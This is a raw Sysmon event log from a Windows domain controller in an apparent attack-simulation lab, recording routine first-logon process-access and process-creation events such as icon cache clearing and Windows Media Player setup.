13:29:59.998{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010875Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010874Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4758-6000-1E05-000000009A01}4708C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010873Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:59.998{08A6967A-4757-6000-1D05-000000009A01}42562916C:\Windows\System32\ie4uinit.exe{08A6967A-4758-6000-1E05-000000009A01}4708C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+1743|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010872Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:00.003{08A6967A-4758-6000-1E05-000000009A01}4708C:\Windows\System32\rundll32.exe10.0.14393.0 (rs1_release.160715-1616)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912LowMD5=C7645D43451C6D94D87F4D07BDE59C89,SHA256=495BBA47FC43EE23054FCD419F2F00457162D1C04296900C6AEA551102A810F3,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{08A6967A-4757-6000-1D05-000000009A01}4256C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 11241100x800000000000000010899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:03.873{08A6967A-4756-6000-1C05-000000009A01}3028C:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt2021-01-14 09:08:07.401 10341000x800000000000000010898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:03.623{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4756-6000-1C05-000000009A01}3028C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:03.623{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4756-6000-1C05-000000009A01}3028C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.951{08A6967A-4288-6000-1000-000000009A01}11361460C:\Windows\system32\svchost.exe{08A6967A-475C-6000-2205-000000009A01}824C:\Windows\System32\unregmp2.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.951{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-475C-6000-2205-000000009A01}824C:\Windows\System32\unregmp2.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.888{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010921Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.888{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010920Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.888{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010919Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.873{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010918Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.873{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-475C-6000-2205-000000009A01}824C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010917Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.873{08A6967A-4754-6000-1705-000000009A01}34085068C:\Windows\Explorer.EXE{08A6967A-475C-6000-2205-000000009A01}824C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+13755f|C:\Windows\System32\windows.storage.dll+1371d5|C:\Windows\System32\windows.storage.dll+136cc6|C:\Windows\System32\windows.storage.dll+138138|C:\Windows\System32\windows.storage.dll+136aee|C:\Windows\System32\windows.storage.dll+10a3b5|C:\Windows\System32\windows.storage.dll+10a734|C:\Windows\System32\windows.storage.dll+109d70|C:\Windows\System32\windows.storage.dll+1241fa|C:\Windows\System32\windows.storage.dll+123f5a|C:\Windows\System32\SHELL32.dll+77991|C:\Windows\System32\SHELL32.dll+767f6|C:\Windows\System32\SHELL32.dll+110821|C:\Windows\System32\SHELL32.dll+7888e|C:\Windows\System32\SHELL32.dll+552284|C:\Windows\System32\SHELL32.dll+551ce0|C:\Windows\System32\SHELL32.dll+551e54|C:\Windows\System32\SHELL32.dll+234591|C:\Windows\System32\SHELL32.dll+110c45|C:\Windows\System32\SHELL32.dll+1234a1 154100x800000000000000010916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.884{08A6967A-475C-6000-2205-000000009A01}824C:\Windows\System32\unregmp2.exe12.0.14393.2551 (rs1_release.181004-1309)Microsoft Windows Media Player Setup UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationunregmp2.exe"C:\Windows\System32\unregmp2.exe" /FirstLogonC:\Windows\system32\ATTACKRANGE\Administrator{08A6967A-4752-6000-9133-2D0000000000}0x2d33912HighMD5=B9F03D42E2D49747FD518412E0AEB09D,SHA256=DEBA397177C965811E35B502D515956CC419781233334FB47CEFDA850021F216,IMPHASH=DFC94E57160B0CE8835243B5D92F3D9E{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000010915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.810{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-475C-6000-2105-000000009A01}3588C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.810{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-475C-6000-2105-000000009A01}3588C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000010913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.810{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-475C-6000-2105-000000009A01}3588C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.779{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.779{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.779{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.779{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.779{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.779{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.701{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+74a3|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.670{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:04.670{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localInvDB-DriverVerSetValue2021-01-14 